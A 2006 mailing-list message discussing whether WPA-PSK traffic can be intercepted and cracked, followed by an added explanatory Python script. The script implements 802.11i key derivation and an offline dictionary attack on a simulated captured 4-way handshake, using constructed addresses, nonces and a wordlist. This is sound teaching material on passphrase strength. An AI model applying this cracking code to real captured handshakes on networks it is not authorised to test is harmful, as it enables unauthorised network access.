On 6 Jun 2006, at 17:12, Spruell, Darren-Perot wrote:

> My understanding is that the key shared by the WLAN nodes in WPA-PSK is used
> to generate session keys, which are then cycled on a frequent basis (by
> TKIP, if configured on WPA1) or another method that escapes me on WPA2
> (802.11i). You ARP spoof and you can have traffic directed to you, but it's
> encrypted using a symmetric session key which you don't have.

This was my understanding of the situation.  The traffic comes to you in
encrypted form (you get it anyway, as wireless is a broadcast medium), but the
rotating keys make it hard to crack the encryption before the key changes.  I
suppose you could steal a connection if you sniffed the initial handshake from
the client.

However, the initial password will be readily available.  I'm not totally up
to speed on WPA, but does this make the connection more easily crackable?

> The biggest weakness pointed out thus far in WPA to my knowledge has been in
> response to weak passphrases used for PSKs and dictionary attacks against
> them.

No fear, a "strong" password would be used, along the lines of random numbers
and letters, upper and lowercase.

> I would challenge that by intercepting WPA-protected traffic you can obtain
> cleartext so simply.

Based on what I've read, I would agree with this.  I would also argue that
most casual Wi-Fi crackers are lazy, and will be more likely to go for the
unsecured AP down the road rather than the guy who's using WPA/TKIP, even if
it is technically crackable.

This does mean that I'll need to use FreeBSD if I want to do it all in one box.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
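The two points the thread circles around, that the session keys are derived from the shared PSK via the sniffed handshake and that the only practical attack so far is a dictionary attack on a weak passphrase, can be shown end to end in code. The following is an added example written for this page, not code from either poster. It follows the IEEE 802.11i derivation (PSK = PBKDF2-HMAC-SHA1 over passphrase and SSID, PTK = PRF-512 over the PMK, both MAC addresses and both nonces, KCK = first 128 bits of the PTK) and the WPA2/CCMP EAPOL-Key MIC (HMAC-SHA1 truncated to 128 bits); the MAC addresses, nonces, simplified EAPOL-Key frame layout, SSID, passphrases and wordlist are all constructed here and are not captured traffic. Note that the passphrase-to-PMK step does not rotate: whatever rekeying TKIP or CCMP does later is derived from the same PMK, so once an attacker has sniffed message 2 of the 4-way handshake the guessing can proceed offline without listening further.

```python
"""Offline dictionary check of a WPA-PSK passphrase from a captured 4-way handshake.

Added example, not part of the original thread. MAC addresses, nonces, the EAPOL-Key
frame layout and the wordlist are constructed inline (hypothetical values); only the
key-derivation steps follow IEEE 802.11i.
"""
import hashlib
import hmac
from typing import Iterable, Optional


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK (used directly as the PMK) per 802.11i: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max ordered MACs then nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """EAPOL-Key MIC for WPA2/CCMP (key descriptor version 2): HMAC-SHA1 truncated to 16 bytes.
    `frame` is the EAPOL-Key frame with its MIC field zeroed. (WPA1/TKIP, version 1, uses HMAC-MD5.)"""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


# Constructed handshake parameters: hypothetical addresses and nonces, not captured traffic.
AA = bytes.fromhex("00112233aabb")       # AP (authenticator) MAC
SPA = bytes.fromhex("66778899ccdd")      # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def simulate_capture(passphrase: str, ssid: str) -> dict:
    """Play the legitimate client sending handshake message 2, the frame an eavesdropper
    would sniff: it carries SNonce in the clear plus a MIC keyed by the KCK."""
    pmk = wpa_psk(passphrase, ssid)
    kck = derive_ptk(pmk, AA, SPA, ANONCE, SNONCE)[:16]    # KCK = first 128 bits of the PTK
    # Simplified EAPOL-Key body: a fixed header, the SNonce and a 16-byte MIC field (zeroed while MICing).
    body = b"\x02\x01\x0a" + SNONCE + b"\x00" * 16
    return {"aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "body": body, "mic": eapol_mic(kck, body)}


def crack_handshake(capture: dict, ssid: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess: for each candidate recompute PMK -> PTK -> KCK -> MIC and compare with the
    captured MIC. Each guess costs 4096 PBKDF2 rounds; a random passphrase is never in the list."""
    for candidate in wordlist:
        pmk = wpa_psk(candidate, ssid)
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["body"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    WORDLIST = ["password", "letmein1", "qwerty"]           # constructed wordlist
    weak = simulate_capture("letmein1", "home-net")
    strong = simulate_capture("gX7!pL2qM9wRv4", "home-net")
    print("weak PSK  :", crack_handshake(weak, "home-net", WORDLIST))
    print("strong PSK:", crack_handshake(strong, "home-net", WORDLIST))
```

Running it recovers "letmein1" for the weak network and nothing for the random passphrase, which is the whole difference the thread is discussing: the captured handshake gives the attacker an offline oracle, and the passphrase quality decides whether that oracle is worth anything. The `wpa_psk` function can be checked against the 802.11i reference vector (passphrase "password", SSID "IEEE").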
